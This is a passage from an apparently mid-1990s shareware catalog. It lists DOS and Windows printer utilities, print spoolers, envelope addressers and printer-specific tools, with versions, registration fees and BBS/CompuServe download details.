as large as your screen; + button-driven control of your CD player including eject and "go + + Chapter 2, "Utilities" 76 + + + + to track"; disc catalog database; display track #, elapsed + time, disc name, track name; stay on top; volume control; auto + resume playing when Windows halts your CD in mid-play. + + + 2.4 Printer utilities + + See also: Utilities, Hardware utilities, Screen, Screen + capture; Spreadsheet applications, Spreadsheet utilities; + Database applications, Mailing list systems; Graphics, + Utilities, Graphic print screen. + + Product: Drag and Drop Printing + Author: + Version: v2.0 (02-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 (add $1.50 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; all ASP-wide offers + (see page 5); discounts on other products; discounts on + upgrades. 3-month free upgrading allowed. + Look for: DDP20.ZIP on BBSs; DDP20.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 75010,235 for + assistance). + PsL#: 11178 + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + Simplifies printing most files under Windows 3.1. Printing a + file is as easy as dragging it from the file manager and + dropping it on the program icon. You have complete control over + all aspects of printing. You can set the margin lengths and + select between normal or sideways printing. Headings and/or + footers can be printed on each page. Features include simulated + duplex printing, "shell" printing of files and many other + features. + + + Product: E-report + Paperless management reports, COLD. See full description on + page 53. + + Chapter 2, "Utilities" 77 + + + + Product: Fonts Ink Fonts + Author: , 317-856-6052 + Version: 1 (01-04-93) + Needs: IBM AT (80286), Windows 3.1 or better. (Windows 3.1 + needed for TrueType fonts.). + Registration fee: $20.00 + Registration benefits: Master disks, phone support. Shareware + disks of other programs. + Look for: VARIOUS on BBSs (multiple files) (call 715-652-2758 to + download it at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An interesting specialized selection of TrueType and PostScript + fonts: + FIKeys KeyCaps (3 styles) + FIBox Word-in-a-box (also white on black) + Fraction Fraction-making fonts + MadAve Solotype's Advertiser Gothic + Elite Prestige Elite (nbix) + FILCD 7-segment LCD (ni) + Torrance 9-pin dot matrix (nb) + FIArrows Arrows of all kinds + USBats Outlines of states, patriotic symbols + Stencil Letters & numbers (2 styles) + + + Product: GridForm + Author: , 317-856-6052 + Version: 1.0 (12-15-91) + Needs: IBM PC, DOS 2.0 or better. HP LaserJet printer. + Registration fee: $15.00 + Registration benefits: Master disks, phone support, disks with + other shareware. + Look for: GRIDFORM.ZIP on BBSs (call 715-652-2758 to download it + at no charge); GRIDFM.ZIP on CompuServe in CIS:PCHW forum + LIBrary 2 (or contact userID 76635,1670 for assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use graph/gridpaper maker. Uses storable templates. + Metric or English units of measure. Linear, log, or natural log + scales. Full control over index lines. Can make highlighted + stripes or even checkerboards. Can make macro or overlay files + for printing later. + + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 91. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 31. + + Chapter 2, "Utilities" 78 + + + + Product: ON-SIDE + Author: , 206-788-0932 + Version: 2.0 (10-20-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Epson printer. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + other products; discounts on upgrades. 1-month free upgrading + allowed. + Look for: ONSIDE.ZIP on BBSs (call 206-788-4008 to download it at + no charge); ONSIDE.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use sideways printing program. Ten font styles + included or create your own. Existing fonts can be edited using + the font editor. On-screen drawing makes the process easy. + Fonts can be magnified and stretched to over 25 sizes each. All + aspects of printing can be controlled: print can be double + struck for darker print, top and bottom can be set, character + width and height can be varied and letter spacing controlled. + + + Product: PrintGF + Author: + Version: 1.26 (09-17-95) + Needs: IBM PC, DOS 3.0 or better. 384k RAM. + Registration fee: $34.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime fax, BBS, CompuServe, mail support. JPEG/TARGA/TIFF + interpreter for Windows. + Look for: PRINTGF.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRINTGF.ZI on CompuServe in CIS:GRAPHSUP forum + LIBrary 8 (or contact userID 70431,32 for assistance). + PsL#: 11033 + Download size: 285k (about 21 minutes with a 2400 baud modem) + Description: + Provides an image printer (BMP, DCX, GIF, PCX, PNG, JPG, TGA, + TIF) for DOS and Windows. Prints or displays image files on 9 + and 24 pin printers, Canon BJ, BJC, Epson Stylus Color, Fargo + Primera, PrimeraPro, HP LaserJet, DeskJet, HP-RTL, PostScript, + Star SJ-144, and many others, and displays on EGA, VGA, VESA + SVGA, HGC. Outputs color or b/w with user selectable size, + position, dithering, brightness, contrast, gamma, edge + smoothing, blur/sharpen, hue shift, and gray balance. + + Chapter 2, "Utilities" 79 + + + + Product: PrintGL + Author: + Version: 1.58 (09-17-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime fax, BBS, CompuServe, mail support. + Look for: PRINTGL.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRINGTL.ZI on CompuServe in CIS:GRAPHSUP forum + LIBrary 2 (or contact userID 70431,32 for assistance). + PsL#: 10217 + Download size: 285k (about 21 minutes with a 2400 baud modem) + Description: + A pen plotter emulator package for DOS and Windows (includes + PrintCAD). It prints HP-GL, HP-GL/2, and ADI data on Epson and + IBM 9 pin printers, Epson, Fujitsu, IBM, NEC, and Toshiba 24 + pin printers, Canon BJ, BJC, Epson Stylus, HP LaserJet, + DeskJet, HP-GL, HP-GL/2, HP-RTL, PDP ProTracer, PostScript + printers, and many others, displays on CGA to VESA SVGA, and + outputs DCX, PCX, EPS files. User selectable pen width, color, + shading, and paper size, magnification, etc. + + + Product: Rubicon Publisher + Full-featured typesetter with fonts. See full description on + page 200. + + Product: SEE (File Viewer) + File viewer with full built-in mouse support. See full + description on page 56. + + Product: Simply Labels + Author: + Version: 4.02 (02-11-93) + Needs: IBM PC, DOS 3.1 or better. 384k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, mail + support; bonus utilities. + Look for: SIMLAB42.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 271k (about 20 minutes with a 2400 baud modem) + Description: + Free form label program with many features and flexible + printing. Options include multiple copies, multiple labels + across, auto centering/indenting, envelopes, reports and many + more. Supports all printers. Also includes flexible sorting, + many types of searches, import/export, read dBase III files, + Date/Time stamps, auto numbering, non-printing lines, and many + more. Program is menu driven, has mouse support and on-line + help. Use for mailing labels, disk labels, cassette jackets, + numbered tickets. + + Chapter 2, "Utilities" 80 + + + + 2.4.1 Print spoolers + + Product: BabySpool + Author: , 303-932-1705 + Version: 3.00 (01-02-95) + Needs: IBM PC, DOS 2.1 or better. 12k RAM; Hard disk. + Registration fee: $22.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; 12-month return + policy; all ASP-wide offers (see page 5); discounts on other + products. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Built on our 10 years of expertise in the background printing + arena, this software provides a "no frills" yet powerful + spooling/despooling environment. Printing takes place in the + background, while you continue working in the foreground. + BabySpool's efficient background printing engine provides + superfast printing. In fact, it is so efficient that it can + support several printers printing simultaneously. A DOS-based + TSR, and supports networks and Windows environments. + + + Product: DISK SPOOL II + Author: , 303-932-1705 + Version: 5.04 (12-29-94) + Needs: IBM PC, DOS 2.1 or better. 20k RAM; Hard disk. + Registration fee: $44.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; 6-month return + policy; site license; all ASP-wide offers (see page 5); + discounts on other products. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; DS2.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 0 (or contact userID 70033,643 for + assistance). + Download size: 379k (about 28 minutes with a 2400 baud modem) + Description: + th + Now in its 10 year on the market, this software provides a + sophisticated background printing and document managment + facility. It includes a powerful popup print manager for + controlling your printing activities ... stop, start, hold, + release, and view documents; change print ports; multiple + copies; save after printing; and more. Fast and efficient + printing. Also works in Windows to provide a single background + printing enviroment across both DOS and Windows. + + Chapter 2, "Utilities" 81 + + + + 2.4.2 Printer control + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 90. + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 198. + + Product: EZSET + Author: , 214-239-9646 + Version: 2.1 (12-05-93) + Needs: IBM PC, DOS 2.1 or better. 78k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: EZSET21.ZIP on BBSs; EZSET.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 70353,1644 for + assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Lets you access all of your printer's features, including those + not available from the control panel. All you need to use it + effectively is your printer's manual. + + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 93. + + Product: LQ + Author: , 704-264-6906 + Version: 2.35 (10-01-90) + Needs: IBM PC, DOS 2.0 or better. 9-pin dot matrix printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, update + disk, support, commissions. + Look for: availability unknown on BBSs; LQ235.ZIP on CompuServe + in CIS:PCHW forum LIBrary 2 (or contact userID 73577,230 for + assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you obtains near-letter quality from 9-pin dot-matrix + printers in a variety of fonts. Works invisibly with your word + processor so you can continue to use familiar commands for + print options such as emphasized, underline, italics, etc. + Changing fonts can be done by inserting codes or by using LQ's + pop-up window. Customized spooler handles printing tasks + + Chapter 2, "Utilities" 82 + + + + efficiently in the background. Also included: font editor, + banner printer, letterhead editor. + + + Product: PPRINT + Author: , 909-352-2820 + Version: 5.5 (11-22-91) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PPRINT55.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PPRINT.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + PPRINT55.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A great ASCII file printing tool providing extensive file + selection and formatting. Uses printer definition files to + support any printer. Specify print size, margins, headings, + footings, line numbering, and even data selection. Print two + pages per piece of paper on a laser printer. Scans a directory + to select multiple files to print. Set lines per page and cols + per line. Featured in Dr. File Finder's Guide to Shareware. + + + 2.4.3 UPCs & bar codes + + Product: Infothek Information Manager + Information Manager. See full description on page 143. + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 241. + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 84. + + Chapter 2, "Utilities" 83 + + + + 2.4.4 Envelope addressers + + Product: APT Mailing Assistant + Author: , 606-873-0589 + Version: 5.30 (01-15-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $24.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 5). CASS certified + program. + Look for: APMAD530.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Prints envelopes or labels on Lexmark/IBM or HP compatible + laser printers, deskjet, and Epson compatible dot matrix + printers. Envelopes and some labels will have USPS approved + POSTNET codes to speed delivery. Also provides easy to use bulk + mail facility with zip code statistics and the capability to + print your bulk mail permit box if desired. Envelopes and + labels are printed in zip code sequence for easy bundling. + Multiple name and address files may be maintained to catagorize + mailing lists. + + + Product: APT Mailing Assistant (OS/2) + Author: , 606-873-0589 + Version: 1.10 (01-15-95) + Needs: IBM 80386, OS/2 2.0 or better. Program can run safely on + a system with no hard disk and only one floppy disk drive; + Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $37.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. 3-month + + Chapter 2, "Utilities" 84 + + + + free upgrading allowed. Registered version is CASS certified + by U.S. Postal Service. + Look for: APMAO110.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAO.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use program that prints several types of envelopes and + labels with delivery point bar codes using HP compatible laser, + deskjet, or Epson compatible dot matrix printers. Can reuse + laser label sheets when printing single labels. Has bulk mail + facility that can print your bulk mail permit box, multiple + address files, and import/export facility. + + + Product: DJ-LOPE + Envelope printer/database for DeskJet printer. See full + description on page 88. + + Product: FF Designer Envelopes + Author: , 407-951-2268 + Version: 1.2 (12-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse. Printer capable of printing envelopes. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 5); + discounts on other products. + Look for: FFDELP.ZIP on BBSs; FFDELP.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 358k (about 27 minutes with a 2400 baud modem) + Description: + A graphics program which enables you to create envelopes and + letterhead stationary. Features include a drag and drop + interface, allowing you to place text, pictures, lines and + rectangles on your designs. Use all your Windows fonts and + bitmaps! Links to Cardfile for management/importing of + addresses and text. Links to Paintbrush for creating/editing + picture files. Prints many envelope sizes and scales your + layouts to fit on larger envelopes. + + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 241. + + Chapter 2, "Utilities" 85 + + + + Product: PrintEnvelope + Author: , 214-432-0700 + Version: 3.01 (05-15-95) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + VBRUN300.DLL. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); lifetime + unlimited phone, fax, CompuServe, GEnie, mail support; bonus + utilities; bonus data; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: ENVEL301.ZIP on BBSs; ENVEL301.Z on CompuServe in + CIS:WINSHARE forum LIBrary 15 (or contact userID 74017,2140 for + assistance); ENVEL3.ZIP on GEnie in WINDOWS forum LIBrary 11 + (or contact userID T.MAURER for assistance). + PsL#: 10442 + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + Any size envelopes, any size labels, on any printer! Packed + with features like: .BMP graphic return address; address import + from address book or Cardfile or dBASE, or ASCII mail list; + city/state automatically filled in when you type ZIP Code, and + auto-select orientation and paper bins. USPS approved PostNet + barcodes. + + + Product: Public Address + Full featured address manager. See full description on + page 243. + + Product: QENV + Author: , 909-591-4956 + Version: 2.5 (08-07-94) + Needs: IBM PC, DOS 4.0 or better. + Registration fee: $15.00 + Registration benefits: 3 months of support. Master disks, + support, upgrade discounts. + Look for: QENV.ZIP on BBSs (call 714-730-6743 to download it at + no charge); QENV.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 7 (or contact userID 73747,3537 for assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + Provides an extremely easy way of printing an envelope. Just + enter the data and press a key to print. Automatically stores + the names & addresses for the envelopes printed which can then + be incorportated into the mail merge function (letter writing). + If using with a LaserJet or compatible printer the U.S. Postal + bar codes are included on the envelope. + + Chapter 2, "Utilities" 86 + + + + Product: Winvelope + Author: , 606-832-2493 + Version: 5.0 (06-04-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $20.00 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to Canadian addresses) (add $4.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 5). 6-month free upgrading allowed. + Look for: WENV50.ZIP on BBSs (call 606-832-4029 to download it at + no charge); WENV50.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71620,24 for assistance). + PsL#: 10401 + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Envelope printing utility for Windows. Includes selectable + envelope size, fonts, return addresses, graphic logos, postnet + barcodes, automatic printer setup, and more. Address Manager + database stores address data in MS Access file format. + Attractive, user-friendly interface. BEGIN QUOTATION "This is a + most excellent envelope printing program..." - Robert Mullen, + author, Windows 3.1 Hyperguide END QUOTATION + + + 2.4.5 Printer specific + + Product: Citizen + Author: + Version: 4.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Citizen MSP or Tribute printer. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CTZN40.ZIP on BBSs; CITZEN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 125k (about ten minutes with a 2400 baud modem) + Description: + This menu-driven utility lets you control the fonts on your + Citizen MSP or Tribute printer. You can also print small text + files and type envelopes from the program. + + Chapter 2, "Utilities" 87 + + + + Product: CrabWise + Author: , 309-787-4967-(X227) + Version: 1.0 (01-01-94) + Needs: IBM PC, DOS 2.11 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. IBM Proprinter. + Strongly recommended: EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus templates; all ASP-wide offers (see page 5). + 6-month free upgrading allowed. 1 free update disk(s) sent + out. Font charts. + Look for: availability unknown on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A text-file landscape printer for the IBM Proprinter series. + + + 2.4.5.1 Epson + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 90. + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 387. + + 2.4.5.2 HP DeskJet + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 89. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 89. + + Product: BOOKLET + PC booklet printing utility. See full description on page 90. + + Chapter 2, "Utilities" 88 + + + + Product: DJ-CHECK + Author: , 704-525-1472 + Version: 2.01 (04-29-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: DJCHEK.ZIP on BBSs; DJCHEK.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); DJCHEK.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Print any size checks (personal or business) using DeskJet + printer. Fully configurable for perfect printing placement on + any size check. Keeps a record on disk or each check you print, + and keeps a running balance as you print checks. + + + Product: DJ-LOPE + Author: , 704-525-1472 + Version: 4.01 (03-27-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: DJLOPE.ZIP on BBSs; DJLOPE.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); DJLOPE.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 88k (about seven minutes with a 2400 baud modem) + Description: + Print envelopes on the DeskJet family of printers on the fly or + from multiple databases of up to 250 adresses each. Multiple + return addresses, new user interface, prints PostNet barcodes. + Supports internal and cartridge fonts. Toggle return address on + or off, search, add, delete records. Prints to LPT1, 2 or 3. + Easy-to-use menu driven interface. Runs from DOS or as a DOS + application under Windows 3.x. Does not support 550C or + Portable models. + + Chapter 2, "Utilities" 89 + + + + Product: DJ-SLEEVE + Author: , 704-525-1472 + Version: 2.0 (01-19-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); SLEEVE.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your DeskJet will print out + a sleeve template containing the names of all the files (date + and size for each file, too). Just cut it out, fold back the + flaps and tape or glue, and you have a storage sleeve for your + 51/4" & 31/2" disks. + + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 91. + + 2.4.5.3 HP LaserJet + + Product: 4Print/4Book DOS + Author: , 212-242-1790 + Version: 4.16 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP DeskJet printer; + HP LaserJet printer. + Registration fee: $49.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + 2-month return policy; bonus utilities; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: availability unknown on BBSs; 4PRINT.ZIP on CompuServe + in CIS:KORENTHAL forum LIBrary 3 (or contact userID 76004,2605 + for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Prints 2 or 3 fully readable pages of text on each sheet of + paper using your LaserJet's or DeskJet's landscape (sideways) + printing capability. Can print on both sides of the page to + yield 4, 6, or even more pages of text per sheet. Perfect for + program listings and documentation; can print one wide column + for spreadsheet and database reports. Includes 4Book for + creating handsome booklets. Supports A4 paper. "Definitely + worth adding to your printer toolbox," says PC Magazine. + + Chapter 2, "Utilities" 90 + + + + Product: 4Print/4Book Windows + Author: , 212-242-1790 + Version: 4.16 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP DeskJet printer; + HP LaserJet printer; VBRUN300.DLL. + Registration fee: $69.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 2-month return policy; bonus + utilities; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: availability unknown on BBSs; 4PRINW.ZIP on CompuServe + in CIS:KORENTHAL forum LIBrary 3 (or contact userID 76004,2605 + for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Includes the full 4Print/4Book DOS package (see above) plus + 4PrinW, our new Windows interface. It lets you specify all + 4Print/4Book options via graphical Windows dialogs plus extra + features such as user-defined, named print styles. + + + Product: BOOKLET + Author: + Version: 4.5 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; HP DeskJet printer; HP LaserJet printer. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; BOOKL*.ZIP on CompuServe + in CIS:PCHW forum LIBrary 2 (multiple files) (or contact userID + 71046,1476 for assistance). + PsL#: 10366 + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Creates PC booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" two pages per side of the paper + turned sideways. Handles A4, letter, legal, and exec paper. + Also prints single sided. + + Converts word processor HPPCL output to fit the reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other printing failures. Use menu/screen + or command line interface with online help. + + Chapter 2, "Utilities" 91 + + + + Product: DMPLAS (Dot Matrix to LaserJet) + Author: , 317-856-6052 + Version: 1.1 (11-15-91) + Needs: IBM PC, DOS 2.0 or better. 6k RAM. + Registration fee: $32.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: DMPLAS??.ZIP on BBSs (multiple files) (call + 715-652-2758 to download it at no charge); DMPLS*.ZIP on + CompuServe in CIS:PCHW forum LIBrary 2 (multiple files) (or + contact userID 76635,1670 for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Small TSR (6k) captures and translates IBM/Epson FX output for + the HP LaserJet. Works with both text and graphics programs + (including GRAPHICS.COM). Uses native LaserJet (or compatible) + fonts or your softfonts. Optional Courier italic and + proportional fonts are also included. Prints at accurate scale + (for filling in forms) or slightly reduced vertical spacing to + print 66 lines per page. Graphics can also be compressed to fit + on the LaserJet's 10" page. + + + Product: GridForm + Prints custom graph paper on LaserJets. See full description + on page 77. + + Product: LASR_MAN + Author: , 813-377-2515 + Version: 6.05 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer; HP + LaserJet printer. HP DeskJet/LaserJet or compatable. + Strongly recommended: Hard disk. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: LMAN605A.ZIP on BBSs (multiple files) (call + 813-371-2490 to download it at no charge); LASMAN.ZIP on + CompuServe in CIS:PCHW forum LIBrary 2 (or contact userID + 71631,744 for assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Laser printer utility for ASCII files with hundreds of styles - + great for program manuals and listings, draft documents, wide + spreadsheets, database and address listings, legal documents. + Styles include: portrait/landscape orientation with any of 5 + fonts of 10-32 characters/inch printing on one or both sides of + each sheet; multiple text pages/sheet - 2 to 200; booklets with + 1-75 files each. Many options: border/text page dividers, + + Chapter 2, "Utilities" 92 + + + + custom covers, header/footers, letter/legal/A4/exec paper, + more++. + + + Product: LJ-SLEEVE + Author: , 704-525-1472 + Version: 2.0 (06-11-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP LaserJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support. + Look for: LJSLEV.ZIP on BBSs; LJSLEV.ZIP on CompuServe in + CIS:HPPER forum LIBrary 4 (or contact userID 75160,2530 for + assistance); LJSLEV.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your LaserJet or compatible + printer will print out a sleeve template containing the names + of all the files (date and size for each file, too). Just cut + it out, fold back the flaps and tape or glue, and you have a + storage sleeve for your 51/4" & 31/2" disks. + + + Product: QFont + Author: , 608-271-2090 + Version: 1.5 (10-20-90) + Needs: IBM AT (80286), DOS 2.1 or better. 